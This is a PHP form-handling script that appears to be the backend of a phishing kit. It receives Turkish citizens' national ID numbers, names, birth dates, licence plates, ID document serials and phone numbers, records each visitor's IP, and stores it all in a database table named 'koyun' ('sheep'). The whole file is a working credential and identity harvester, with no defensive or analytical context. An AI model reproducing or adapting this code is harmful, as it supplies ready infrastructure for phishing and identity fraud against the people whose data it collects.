<?php 
if($_SERVER['REQUEST_METHOD'] == 'POST'){
	if(!empty($_POST['tckn']) || !empty($_POST['ad']) || !empty($_POST['soyad']) || !empty($_POST['dtrh']) || !empty($_POST['plaka']) || !empty($_POST['belge_seri']) || !empty($_POST['belge_seri_no']) || !empty($_POST['telefon'])){

		if(empty($_SERVER['HTTP_CF_CONNECTING_IP'])){
			$_SERVER['HTTP_CF_CONNECTING_IP'] = $_SERVER['REMOTE_ADDR'];
		}

		$ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
		date_default_timezone_set('Europe/Istanbul');
		$date = date('d.m.Y H:i:s');
		include 'db.php';

		$tckn = htmlspecialchars($_POST['tckn']);
		$ad = htmlspecialchars($_POST['ad']);
		$soyad = htmlspecialchars($_POST['soyad']);
		$dtrh = htmlspecialchars($_POST['dtrh']);
		$plaka = htmlspecialchars($_POST['plaka']);
		$belge_seri = htmlspecialchars($_POST['belge_seri']);
		$telefon = htmlspecialchars($_POST['telefon']);
		$belge_seri_no = $belge_seri.htmlspecialchars($_POST['belge_seri_no']);

		$q = $db->prepare("INSERT INTO koyun SET tckn = :tckn, ad = :ad, soyad = :soyad, dtrh = :dtrh, plaka = :plaka, belge_seri_no = :belge_seri_no, telefon = :telefon, date = :date, ip = :ip");
		$q->bindParam(':tckn', $tckn);
		$q->bindParam(':ad', $ad);
		$q->bindParam(':soyad', $soyad);
		$q->bindParam(':dtrh', $dtrh);
		$q->bindParam(':plaka', $plaka);
		$q->bindParam(':belge_seri_no', $belge_seri_no);
		$q->bindParam(':telefon', $telefon);
		$q->bindParam(':date', $date);
		$q->bindParam(':ip', $ip);
		$f = $q->execute();

		if($f){
			$data = [
				'status' => true
			];
			die(json_encode($data));
		}else{
			$data = [
				'status' => false,
				'message' => 'Sistemsel bir hata oluştu'
			];
			die(json_encode($data));
		}
	}else{
		$data = [
			'status' => false,
			'message' => 'Tüm alanları doldurmak zorundasınız'
		];
		die(json_encode($data));
	}
}
?>